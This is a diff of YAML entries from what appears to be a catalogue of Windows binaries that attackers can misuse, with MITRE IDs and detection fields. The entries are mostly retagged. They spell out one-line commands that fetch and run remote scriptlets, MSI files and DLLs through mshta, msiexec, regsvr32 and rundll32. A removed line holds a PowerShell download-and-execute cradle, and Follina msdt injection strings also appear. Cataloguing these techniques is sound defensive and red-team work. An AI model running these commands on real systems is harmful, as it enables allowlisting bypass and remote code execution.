Tags: Tags:
- Application: GUI - Application: GUI
- Execute: MSI
- Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe" - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
Usecase: Execute code bypass Application allowlisting Usecase: Execute code bypass Application allowlisting
@ -31,6 +33,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Application: GUI - Application: GUI
- Execute: CMD
Full_Path: Full_Path:
- Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\System32\Msdt.exe
- Path: C:\Windows\SysWOW64\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe

View File

@ -25,6 +25,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe
- Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

View File

@ -12,7 +12,8 @@ Commands:
MitreID: T1218.005 MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: WSH - Execute: HTA
- Execute: Remote
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
Description: Executes VBScript supplied as a command line argument. Description: Executes VBScript supplied as a command line argument.
Usecase: Execute code Usecase: Execute code
@ -20,6 +21,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.005 MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: VBScript
- Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close(); - Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close();
Description: Executes JavaScript supplied as a command line argument. Description: Executes JavaScript supplied as a command line argument.
Usecase: Execute code Usecase: Execute code
@ -27,6 +30,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.005 MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: mshta.exe "C:\ads\file.txt:file.hta" - Command: mshta.exe "C:\ads\file.txt:file.hta"
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
Usecase: Execute code hidden in alternate data stream Usecase: Execute code hidden in alternate data stream
@ -35,7 +40,7 @@ Commands:
MitreID: T1218.005 MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
Tags: Tags:
- Execute: WSH - Execute: HTA
- Command: mshta.exe https://example.com/payload - Command: mshta.exe https://example.com/payload
Description: It will download a remote payload and place it in INetCache. Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server Usecase: Downloads payload from remote server

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.007 MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: MSI
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
Description: Installs the target remote & renamed .MSI file silently. Description: Installs the target remote & renamed .MSI file silently.
Usecase: Execute custom made msi file with attack code from remote server Usecase: Execute custom made msi file with attack code from remote server
@ -18,6 +20,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.007 MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: MSI
- Execute: Remote
- Command: msiexec /y "C:\folder\evil.dll" - Command: msiexec /y "C:\folder\evil.dll"
Description: Calls DllRegisterServer to register the target DLL. Description: Calls DllRegisterServer to register the target DLL.
Usecase: Execute dll files Usecase: Execute dll files
@ -27,6 +32,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL
- Execute: Remote
- Command: msiexec /z "C:\folder\evil.dll" - Command: msiexec /z "C:\folder\evil.dll"
Description: Calls DllUnregisterServer to un-register the target DLL. Description: Calls DllUnregisterServer to un-register the target DLL.
Usecase: Execute dll files Usecase: Execute dll files
@ -36,6 +42,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL
- Execute: Remote
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.
Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server
@ -43,6 +50,10 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.007 MitreID: T1218.007
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: MSI
- Execute: MST
- Execute: Remote
Full_Path: Full_Path:
- Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\System32\msiexec.exe
- Path: C:\Windows\SysWOW64\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: pcalua.exe -a \\server\payload.dll - Command: pcalua.exe -a \\server\payload.dll
Description: Open the target .DLL file with the Program Compatibilty Assistant. Description: Open the target .DLL file with the Program Compatibilty Assistant.
Usecase: Proxy execution of remote dll file Usecase: Proxy execution of remote dll file
@ -20,6 +22,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Execute: DLL - Execute: DLL
- Execute: Remote
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
Description: Open the target .CPL file with the Program Compatibility Assistant. Description: Open the target .CPL file with the Program Compatibility Assistant.
Usecase: Execution of CPL files Usecase: Execution of CPL files
@ -27,6 +30,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\pcalua.exe - Path: C:\Windows\System32\pcalua.exe
Detection: Detection:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: Pcwrun.exe /../../$(calc).exe - Command: Pcwrun.exe /../../$(calc).exe
Description: Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Description: Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
Usecase: Proxy execution of binary Usecase: Proxy execution of binary
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\System32\pcwrun.exe - Path: C:\Windows\System32\pcwrun.exe
Detection: Detection:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1547 MitreID: T1547
OperatingSystem: Windows 7, Windows 10, Windows 11 OperatingSystem: Windows 7, Windows 10, Windows 11
Tags:
- Execute: INF
Full_Path: Full_Path:
- Path: C:\Windows\system32\pnputil.exe - Path: C:\Windows\system32\pnputil.exe
Code_Sample: Code_Sample:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: XBAP
- Command: Presentationhost.exe https://example.com/payload - Command: Presentationhost.exe https://example.com/payload
Description: It will download a remote payload and place it in INetCache. Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server Usecase: Downloads payload from remote server

View File

@ -11,6 +11,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: c:\windows\system32\provlaunch.exe - Path: c:\windows\system32\provlaunch.exe
Detection: Detection:

View File

@ -5,15 +5,14 @@ Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
- Command: regasm.exe AllTheThingsx64.dll - Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .Net DLL file and executes the RegisterClass function.
Usecase: Execute code and bypass Application whitelisting Usecase: Execute code and bypass Application whitelisting
Category: AWL Bypass Category: AWL Bypass
Privileges: Local Admin Privileges: Local Admin
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL (.NET)
- Input: Custom Format
- Command: regasm.exe /U AllTheThingsx64.dll - Command: regasm.exe /U AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the UnRegisterClass function. Description: Loads the target .DLL file and executes the UnRegisterClass function.
Usecase: Execute code and bypass Application whitelisting Usecase: Execute code and bypass Application whitelisting
@ -22,8 +21,7 @@ Commands:
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL (.NET)
- Input: Custom Format
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe

View File

@ -5,25 +5,23 @@ Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
- Command: regsvcs.exe AllTheThingsx64.dll - Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .Net DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting Usecase: Execute dll file and bypass Application whitelisting
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL (.NET)
- Input: Custom Format
- Command: regsvcs.exe AllTheThingsx64.dll - Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .Net DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting Usecase: Execute dll file and bypass Application whitelisting
Category: AWL Bypass Category: AWL Bypass
Privileges: Local Admin Privileges: Local Admin
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL (.NET)
- Input: Custom Format
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe

View File

@ -11,6 +11,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.010 MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Execute: Remote
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll. Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting Usecase: Execute code from scriptlet, bypass Application whitelisting
@ -18,6 +21,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.010 MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll. Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting Usecase: Execute code from remote scriptlet, bypass Application whitelisting
@ -25,6 +30,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.010 MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Execute: Remote
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll. Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting Usecase: Execute code from scriptlet, bypass Application whitelisting
@ -32,6 +40,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.010 MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
Full_Path: Full_Path:
- Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\System32\regsvr32.exe
- Path: C:\Windows\SysWOW64\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe

View File

@ -22,13 +22,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');") - Execute: Remote
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
Usecase: Execute code from Internet
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
Usecase: Proxy execution Usecase: Proxy execution
@ -36,13 +30,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} Tags:
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. - Execute: JScript
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
Usecase: Execute code from Internet Usecase: Execute code from Internet
@ -50,6 +39,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
Usecase: Execute code from alternate data stream Usecase: Execute code from alternate data stream
@ -67,7 +58,7 @@ Commands:
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10 (and likely previous versions), Windows 11 OperatingSystem: Windows 10 (and likely previous versions), Windows 11
Tags: Tags:
- Execute: DLL - Execute: COM
Full_Path: Full_Path:
- Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\System32\rundll32.exe
- Path: C:\Windows\SysWOW64\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: c:\windows\system32\runexehelper.exe - Path: c:\windows\system32\runexehelper.exe
Detection: Detection:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\System32\runonce.exe
- Path: C:\Windows\SysWOW64\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: PowerShell
Full_Path: Full_Path:
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing> - Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing>
Description: Modifies an existing service and executes the file stored in the ADS. Description: Modifies an existing service and executes the file stored in the ADS.
Usecase: Execute binary file hidden inside an alternate data stream Usecase: Execute binary file hidden inside an alternate data stream
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\System32\sc.exe - Path: C:\Windows\System32\sc.exe
- Path: C:\Windows\SysWOW64\sc.exe - Path: C:\Windows\SysWOW64\sc.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1053.005 MitreID: T1053.005
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
Description: Create a scheduled task on a remote computer for persistence/lateral movement Description: Create a scheduled task on a remote computer for persistence/lateral movement
Usecase: Create a remote task to run daily relative to the the time of creation Usecase: Create a remote task to run daily relative to the the time of creation
@ -18,6 +20,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1053.005 MitreID: T1053.005
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: c:\windows\system32\schtasks.exe - Path: c:\windows\system32\schtasks.exe
- Path: c:\windows\syswow64\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Description: Executes calc.cmd from remote server Description: Executes calc.cmd from remote server
Usecase: Execute binary through proxy binary from external server to evade defensive counter measures Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
@ -18,6 +20,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: Remote
- Execute: CMD
Full_Path: Full_Path:
- Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\System32\scriptrunner.exe
- Path: C:\Windows\SysWOW64\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: c:\windows\system32\setres.exe - Path: c:\windows\system32\setres.exe
Detection: Detection:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: EXE
- Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything
Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32. Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32.
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file. Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: C:\Windows\System32\SettingSyncHost.exe - Path: C:\Windows\System32\SettingSyncHost.exe
- Path: C:\Windows\SysWOW64\SettingSyncHost.exe - Path: C:\Windows\SysWOW64\SettingSyncHost.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 1809, Windows Server 2019 OperatingSystem: Windows 10 1809, Windows Server 2019
Tags:
- Execute: CMD
- Command: ssh -o ProxyCommand=calc.exe . - Command: ssh -o ProxyCommand=calc.exe .
Description: Executes calc.exe from ssh.exe Description: Executes calc.exe from ssh.exe
